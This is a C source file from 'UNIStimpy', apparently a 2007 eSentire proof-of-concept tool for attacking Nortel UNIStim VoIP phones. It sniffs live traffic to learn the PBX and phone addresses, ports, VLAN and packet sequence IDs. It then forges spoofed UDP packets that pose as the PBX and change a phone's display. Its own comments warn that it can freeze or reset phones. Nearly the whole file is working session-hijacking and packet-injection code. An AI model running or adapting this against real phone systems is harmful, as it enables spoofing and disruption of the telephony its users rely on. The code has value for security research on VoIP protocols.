/* UNIStimpy nortelvoip.c
 *  Copyright (C) 2007 eSentire, Inc.
 *  All other trademarks and copyrights are the property of their respective holders.
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License along
 *  with this program; if not, write to the Free Software Foundation, Inc.,
 *  51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 */
/*
 *
 * Provides much of the back-end functionality of the UNIStimpy suite.
 * Note that this is only a proof-of-concept program (so error handling etc. not
 * handled. Suck it up.)
 *
 * WARNING:     We have found that this program can freeze/reset an IP
 *              phone/system.  We don't recommend its use on anything but a
 *              test system, in a closed laboratory environment.
 *
 * WARNING 2:   We have found that this program can freeze/reset an IP
 *              phone/system.  We don't recommend its use on anything but a
 *              test system, in a closed laboratory environment.  We mean it.  
 * 
 * HAJIME!
 */


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <strings.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ether.h>
#include <net/ethernet.h>
#include <libnet.h>
#include <time.h>
#include <pcap.h>
#include "nortelvoip.h"
#include "vlanhdr.h"




void writePacket(
		libnet_t* l, 
		unsigned char* src_mac, struct in_addr from_ip, uint16_t sport, 
		unsigned char* dst_mac, struct in_addr to_ip, uint16_t dport, 
		unsigned char* payload, unsigned int payload_size, struct vlan_info* vlanInfo)
{
	if (vlanInfo)
	{
		if ( !(0 <= vlanInfo->priority && vlanInfo->priority <= 7)
				|| !(0 <= vlanInfo->cfi && vlanInfo->cfi <= 1)
				|| !(0 <= vlanInfo->id && vlanInfo->id <= 4095)
		   )
		{
			printf("Invalid vlan info\n");
			abort();
		}
	}


	libnet_ptag_t udp = libnet_build_udp(
			sport,                       //sport
			dport,                       //dport
			LIBNET_UDP_H + payload_size, //pkt len
			0,                           //checksum
			payload,                     //payload
			payload_size,                //payload size
			l,
			0);
	if (udp == -1)
	{
		printf("Can't build UDP header: %s\n", libnet_geterror(l));
		exit(1);
	}

	libnet_ptag_t ip = libnet_build_ipv4(
			LIBNET_IPV4_H + LIBNET_UDP_H + payload_size,  //len
			0,                                            //tos
			242,                                          //ip id
			0,                                            //ip frag
			64,                                           //ttl
			IPPROTO_UDP,                                  //proto
			0,                                            //checksum
			from_ip.s_addr,                               //source
			to_ip.s_addr,                                 //dest
			NULL,                                         //payload
			0,                                            //payload size
			l,
			0);
	if (ip == -1)
	{
		printf("Can't build IP header: %s\n", libnet_geterror(l));
		exit(1);
	}


	if (vlanInfo)
	{
		int priority = vlanInfo->priority;
		int cfi = vlanInfo->cfi;
		int id = vlanInfo->id;
		uint16_t flags = 0;
		flags = (priority << 13 & 0xe000) | (cfi << 12 & 0x1000) | (id & 0x0fff);
		struct vlanhdr vlan;
		vlan.flags = ntohs(flags);
		vlan.type = ntohs(ETHERTYPE_IP);
		
		libnet_ptag_t ether = libnet_build_ethernet(
				(unsigned char*)dst_mac,//"012345",//ethernet dest
				(unsigned char*)src_mac,//"987654",//ethernet source
				ETHERTYPE_VLAN,//protocol type  (ETHERTYPE_IP)
				(unsigned char*)&vlan,//payload
				sizeof(struct vlanhdr),//payload size
				l,
				0);
		if (ether == -1)
		{
			printf("Can't build ether header: %s\n", libnet_geterror(l));
			exit(1);
		}
	}
	else
	{
		libnet_ptag_t ether = libnet_build_ethernet(
				(unsigned char*)dst_mac,//ethernet dest
				(unsigned char*)src_mac,//ethernet source
				ETHERTYPE_IP,//protocol type  (ETHERTYPE_IP)
				NULL,//payload
				0,//payload size
				l,
				0);
		if (ether == -1)
		{
			printf("Can't build ether header: %s\n", libnet_geterror(l));
			exit(1);
		}
	}

	int c = libnet_write(l);
	if (c == -1)
	{
		printf("Write error: %s\n", libnet_geterror(l));
		exit(1);
	}
	else
	{
		//printf("Wrote %d bytes\n", c);
	}

	libnet_clear_packet(l);
}

void changeDisplay(
		libnet_t* l, uint32_t packet_id, char* text, 
		unsigned char* pbx_mac, struct in_addr pbx_ip, uint16_t pbx_port, 
		unsigned char* phone_mac, struct in_addr phone_ip, uint16_t phone_port, 
		uint16_t vlan_id)
{

	unsigned int payload_size = 4 + 2 + 5 + strlen(text);
	unsigned char* payload = (unsigned char*)malloc(payload_size);
	
	*(uint32_t*)payload = htonl(packet_id);
	payload[4] = 0x02; 
	payload[5] = 0x01;
	payload[6] = 0x17;
	payload[7] = payload_size - 4 - 2;
	payload[8] = 0x19;
	payload[9] = 0x04;
	payload[10] = 0x00;

	strncpy((char*)&payload[11], text, strlen(text));

	if (vlan_id != 0)
	{
		struct vlan_info vlanInfo;
		vlanInfo.priority = 5;
		vlanInfo.cfi = 0;
		vlanInfo.id = vlan_id;
		writePacket(l, pbx_mac, pbx_ip, pbx_port, phone_mac, phone_ip, phone_port, payload, payload_size, &vlanInfo);
	}
	else
	{
		writePacket(l, pbx_mac, pbx_ip, pbx_port, phone_mac, phone_ip, phone_port, payload, payload_size, NULL);
	}

	free(payload);
}


struct params sniffUsefulParams(char* interface, struct in_addr phone_ip)
{
	char pcap_errbuf[PCAP_ERRBUF_SIZE];
	struct params retval;
	retval.vlan_id = 0;
	retval.server_packet_id = 0xffffffff;
	retval.client_packet_id = 0xffffffff;
	retval.client_tag = 0xffffffff;
	bzero(&retval.pbx_mac, sizeof(retval.pbx_mac));
	bzero(&retval.phone_mac, sizeof(retval.phone_mac));

	pcap_t* live_pcap = NULL;
	live_pcap = pcap_open_live(interface, 2000, false, 20, pcap_errbuf);
	if (live_pcap == NULL)
	{
		printf("Error occured while opening live pcap interface: %s\n", pcap_errbuf);
		exit(1);
	}

	struct bpf_program fp;
	bzero(&fp, sizeof(struct bpf_program));
	char pcap_program_str[512];
	sprintf(pcap_program_str, "((vlan and udp) or udp) and src host %s and src portrange 0-5199 and dst portrange 0-5199", inet_ntoa(phone_ip));
	if (pcap_compile(live_pcap, &fp, pcap_program_str, 1, 0) < 0)
	{
		printf("Error compiling bpf program '%s': %s\n", pcap_program_str, pcap_geterr(live_pcap));
		exit(1);
	}
	if (pcap_setfilter(live_pcap, &fp) != 0)
	{
		printf("Error setting bpf filter: %s\n", pcap_geterr(live_pcap));
		exit(1);
	}


	while (retval.client_packet_id == 0xffffffff || retval.server_packet_id == 0xffffffff || retval.client_tag == 0xffffffff)
	{
		struct pcap_pkthdr* pkthdr = NULL;
		const unsigned char* packet;
		int status = pcap_next_ex(live_pcap, &pkthdr, &packet);
		if (status != 1)
		{
			printf("Error getting packet (%i)\n", status);
			exit(1);
		}

		struct ether_header* ether = NULL;
		struct vlanhdr* vlan = NULL;
		struct iphdr* iph = NULL;
		struct udphdr* udp = NULL;

		const unsigned char* ptr = packet;
		ether = (struct ether_header*)ptr;
		ptr += sizeof(struct ether_header);

		if (ntohs(ether->ether_type) == ETHERTYPE_VLAN)
		{
			vlan = (struct vlanhdr*)ptr;
			retval.vlan_id = ntohs(vlan->flags) & 0x0fff;
			ptr += sizeof(struct vlanhdr);

		}
		else if (ntohs(ether->ether_type) != ETHERTYPE_IP)
		{
			printf("Unhandled ethernet type!\n");
			exit(1);
		}

		iph = (struct iphdr*)ptr;

		int iphdr_len = iph->ihl * 4;
		ptr += iphdr_len;

		memcpy(&retval.pbx_ip.s_addr, &iph->daddr, sizeof(uint32_t));

		if ( iph->version != 4 )
		{
			printf("Unhandled ip version\n");
			exit(1);
		}

		if ( iph->protocol != IPPROTO_UDP )
		{
			printf("Unhandled protocol!\n");
			exit(1);
		}

		udp = (struct udphdr*)ptr;
		ptr += sizeof(struct udphdr);

		retval.phone_port = ntohs(udp->source);
		retval.pbx_port = ntohs(udp->dest);

		uint32_t packet_id = ntohl(*((uint32_t*)ptr));
		ptr += 4;

		unsigned char flag1 = ptr[0];
		unsigned char flag2 = ptr[1];

		if (flag1 == 2)
		{
			if (flag2 == 1)
			{
				retval.server_packet_id = packet_id;
				memcpy(retval.pbx_mac, ether->ether_shost, 6);
				memcpy(retval.phone_mac, ether->ether_dhost, 6);
			}
			else if (flag2 == 2)
			{
				retval.client_packet_id = packet_id;
				retval.client_tag = ntohl(*((uint32_t*)&ptr[2]));
				memcpy(retval.pbx_mac, ether->ether_dhost, 6);
				memcpy(retval.phone_mac, ether->ether_shost, 6);
			}
			else
			{
				printf("???\n");
				abort();
			}
		}
		else if (flag1 == 1)
		{
			if (flag2 == 1 || flag2 == 0)
			{
				retval.client_packet_id = packet_id;
				memcpy(retval.pbx_mac, ether->ether_shost, 6);
				memcpy(retval.phone_mac, ether->ether_dhost, 6);
			}
			else if (flag2 == 2)
			{
				retval.server_packet_id = packet_id;
				memcpy(retval.pbx_mac, ether->ether_dhost, 6);
				memcpy(retval.phone_mac, ether->ether_shost, 6);
			}
			else
			{
				printf("???\n");
				abort();
			}
		}
	}


	pcap_close(live_pcap);

	return retval;
}

